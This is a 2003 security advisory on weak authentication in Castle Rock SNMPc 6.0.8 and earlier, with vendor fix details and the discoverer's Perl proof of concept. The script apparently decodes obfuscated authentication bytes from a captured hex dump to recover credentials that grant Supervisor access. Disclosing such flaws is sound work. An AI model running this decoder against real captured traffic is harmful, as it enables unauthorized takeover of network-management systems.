Weak Authentication in SNMPc

Reported
August 27, 2003 by Alexander V. Nickolenko.

VERSIONS AFFECTED
Castle Rock SNMPc 6.0.8 and earlier

DESCRIPTION
A vulnerability in Castle Rock SNMPc 6.0.8 and earlier can allow any remote user to gain Supervisor access to the vulnerable system. The vulnerability is the result of a weak authentication protocol.

DEMONSTRATION
The discoverer posted the following code as proof of concept:

#!/usr/bin/perl
# Lookup table: the character at offset N is substituted for byte value N.
$str='.YZ[\\]^_PQRSTUVWHIJKLMNO@ABCDEFGxyz{|}~.pqrstuvwhijklmno`abcdefg................................89:;<=>?01234567()*+,-./
!"#$%&\'................................................................................................................................';
# Read a hex dump and start collecting bytes at the line with offset 0130.
while(<>)
{
    $s="";
    if(/^0130 /){
        GETIT: {
            do
            {
                s/^0130 00 00 // if /^0130/;   # drop the offset and the two leading bytes
                s/^[[:xdigit:]]{4} //;         # drop the offset column on later lines
                s/ .*$//ms;
                $s=$s." ".$_;
                last GETIT if ($s =~ / 00/);   # stop at the first 00 byte
            } while (<>)
        };
        $s=~s/ 00.*$//ms;
        # Map each pair of hex bytes through the lookup table.
        $s=~s/ ([[:xdigit:]]{2}) ([[:xdigit:]]{2})/ substr($str,(hex($1)),1).substr($str,(hex($2)),1) /ige;
        $s=~s/ ([[:xdigit:]]{2})/ chr(hex($1)) /ige;
        print ":$s:\n";
    }
}

VENDOR RESPONSE
Castle Rock has released fixes for versions 6.0.5 and 6.0.8 and a full version fix for release 5.1.

CREDIT
Discovered by Alexander V. Nickolenko.